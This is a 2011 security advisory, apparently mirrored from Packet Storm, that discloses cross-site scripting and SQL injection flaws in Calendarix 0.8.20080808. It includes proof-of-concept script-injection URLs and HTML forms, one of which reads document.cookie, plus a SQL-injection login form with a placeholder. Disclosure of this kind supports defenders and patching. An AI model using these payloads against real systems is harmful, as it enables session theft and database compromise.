Lucene search
K

Calendarix 0.8.20080808 Cross Site Scripting / SQL Injection

🗓️ 11 May 2011 00:00:00Reported by High-Tech Bridge SAType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Cross Site Scripting and SQL Injection in Calendarix 0.8.2008080

Code
`=============================  
Vulnerability ID: HTB22974  
Reference: http://www.htbridge.ch/advisory/multiple_xss_in_calendarix.html  
Product: Calendarix  
Vendor: http://www.calendarix.com ( http://www.calendarix.com )   
Vulnerable Version: 0.8.20080808  
Vendor Notification: 26 April 2011   
Vulnerability Type: XSS (Cross Site Scripting)  
Risk level: Medium   
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )   
  
Vulnerability Details:  
User can execute arbitrary JavaScript code within the vulnerable application.  
The vulnerability exists due to failure in the "/cal_login.php" script to properly sanitize user-supplied input.  
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.  
The following PoC is available:  
  
  
http://[host]/cal_login.php/%27%3E%3Cscript%3Ealert%28123%29;%3C/script%3E  
  
  
The vulnerability exists due to failure in the "/cal_catview.php" script to properly sanitize user-supplied input in "gocat" variable.  
The following PoC is available:  
  
  
<form action="http://[host]/cal_catview.php?catop=viewcat" method="post" name="main" />  
<input type="hidden" name="gocat" value="'</script><script>alert(document.cookie);</script>"/>  
<input type="submit" value="submit"/>  
</form>  
  
  
The vulnerability exists due to failure in the "/cal_date.php" script to properly sanitize user-supplied input in "frmname" variable.  
The following PoC is available:  
  
  
http://[host]/cal_date.php?frmname=%3C/script%3E%3Cscript%3Ealert%28123%29;%3C/script%3E  
  
  
The vulnerability exists due to failure in the "/cal_date.php" script to properly sanitize user-supplied input in "leftfooter" variable when register_globals is on.  
The following PoC is available:  
  
  
http://[host]/cal_footer.inc.php?leftfooter=%3Cscript%3Ealert%28123%29;%3C/script%3E  
  
  
=============================  
Vulnerability ID: HTB22975  
Reference: http://www.htbridge.ch/advisory/sql_injection_in_calendarix.html  
Product: Calendarix  
Vendor: http://www.calendarix.com ( http://www.calendarix.com )   
Vulnerable Version: 0.8.20080808  
Vendor Notification: 26 April 2011   
Vulnerability Type: SQL Injection  
Risk level: High   
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )   
  
Vulnerability Details:  
The vulnerability exists due to failure in the "cal_login.php" script to properly sanitize user-supplied input in "login" variable when "password" variable empty.   
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.  
Attacker can use browser to exploit this vulnerability. The following PoC is available:  
  
  
<form action="http://[host]/cal_login.php?op=login" method="post" name="main" />  
<input type="hidden" name="login" value="'SQL_CODE_HERE"/>  
<input type="hidden" name="password" value=""/>  
<input type="submit" value="submit"/>  
</form>  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation